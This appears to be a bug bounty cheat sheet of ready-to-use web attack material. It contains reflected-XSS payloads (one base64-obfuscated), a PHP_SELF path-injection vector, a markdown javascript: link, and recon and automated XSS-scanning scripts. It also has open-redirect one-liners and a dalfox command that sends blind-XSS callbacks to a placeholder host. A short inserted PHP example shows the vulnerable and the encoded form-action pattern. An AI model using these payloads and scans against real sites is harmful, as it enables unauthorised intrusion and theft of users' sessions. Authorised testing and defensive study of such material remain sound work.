Use when the current URL is used by the target's underlying PHP code as an attribute value of an HTML form, for example. Inject between the .php extension and the start of the query part (?) using a leading slash (/).
https://brutelogic.com.br/xss.php/"><svg onload=alert(1)>?a=reader
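The server-side pattern behind this vector, next to its encoded form, as an added example that is not part of the original post. The function names are hypothetical, and `$phpSelf` and `$scriptName` stand in for `$_SERVER['PHP_SELF']` and `$_SERVER['SCRIPT_NAME']` with values constructed from the URL above.

```php
<?php
// Added example, not from the original post. Function names are hypothetical.
// $phpSelf stands in for $_SERVER['PHP_SELF'], which includes any PATH_INFO
// that follows the script name in the request path.

function render_form_unsafe(string $phpSelf): string
{
    // Vulnerable: the request path is written into the attribute unencoded.
    return '<form action="' . $phpSelf . '" method="post">';
}

function render_form_encoded(string $phpSelf): string
{
    // Attribute-context encoding: ", ', <, > and & become entities,
    // so the value cannot close the attribute or the tag.
    $safe = htmlspecialchars($phpSelf, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<form action="' . $safe . '" method="post">';
}

function render_form_script_name(string $scriptName): string
{
    // $scriptName stands in for $_SERVER['SCRIPT_NAME'], which excludes PATH_INFO.
    // Still encoded, so the output is safe whatever the server supplies.
    $safe = htmlspecialchars($scriptName, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<form action="' . $safe . '" method="post">';
}

// Constructed values for the request shown above (path only, query string excluded).
$phpSelf    = '/xss.php/"><svg onload=alert(1)>';
$scriptName = '/xss.php';

foreach ([
    'unsafe'      => render_form_unsafe($phpSelf),
    'encoded'     => render_form_encoded($phpSelf),
    'script_name' => render_form_script_name($scriptName),
] as $label => $html) {
    // A second tag opening in the output means the value escaped the attribute.
    $brokeOut = substr_count($html, '<') > 1;
    printf("%-12s %s\n  broke out of attribute: %s\n", $label, $html, $brokeOut ? 'yes' : 'no');
}
```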
Markdown Vector
Use in text boxes, comment sections, etc. that allow some markup input. Click to fire.
[clickme](javascript:alert`1`)
Dnsbruter - DNS Bruteforcing Tool
It is a powerful tool designed to perform active subdomain enumeration and discovery.
Link: https://github.com/sanjai-AK47/Dnsbruter/
Bug Bounty PoC's
https://drive.google.com/drive/folders/14zlqgin6rUfr6jQRBCLbbP8P8Vdypz7x
Top 3 RXSS payloads
`'";//><img/src=x onError="${x};alert(`1`);">
`'";//><Img Src=a OnError=location=src>
`'";//></h1><Svg+Only%3d1+OnLoad%3dconfirm(atob("WW91IGhhdmUgYmVlbiBoYWNrZWQgYnkgb3R0ZXJseSE%3d"))>
Simple Reflected XSS
1. subfinder -d target.com | httprobe -c 100 > target.txt
2. cat target.txt | waybackurls | gf xss | kxxs
For Automation Reflected XSS Scanning
#!/bin/bash
# Prompt user for domain input
read -r -p "Enter the domain you want to scan: " domain
# Define output file
output_file="scan_output.txt"
# Run subfinder to find subdomains, filter through httprobe, and save to target.txt
echo "Finding subdomains for $domain..."
subfinder -d "$domain" | httprobe -c 100 > target.txt
# Use waybackurls to find URLs from Wayback Machine, filter through gf for XSS, and scan with kxxs
echo "Scanning for XSS vulnerabilities..."
cat target.txt | waybackurls | gf xss | kxxs >> "$output_file"
# Display output file location
echo "Scan output saved to $output_file"
Toxicache
Golang scanner to find web cache poisoning vulnerabilities in a list of URLs and test multiple injection techniques.
https://lnkd.in/gdtpJGmT
Awesome Bug Bounty One-liners
A collection of awesome one-liner scripts especially for bug bounty.
Open-redirect
Bash
export LHOST="URL"; gau $1 | gf redirect | qsreplace "$LHOST" | xargs -I % -P 25 sh -c 'curl -Is "%" 2>&1 | grep -q "Location: $LHOST" && echo "VULN! %"'
Bash
cat URLS.txt | gf url | tee url-redirect.txt && cat url-redirect.txt | parallel -j 10 curl --proxy http://127.0.0.1:8080 -sk > /dev/null
XSS
waybackurls HOST | gf xss | sed 's/=.*/=/' | sort -u | tee FILE.txt && cat FILE.txt | dalfox -b YOURS.xss.ht pipe > OUT.txt
Bash
cat HOSTS.txt | getJS | httpx --match-regex "addEventListener\((?:'|\")message(?:'|\")"
Repositories:
1. https://lnkd.in/dMBdxSQD
2. https://lnkd.in/ebTrAP8y
3. https://lnkd.in/dmG4G3ea
4. https://lnkd.in/dXxHMUu9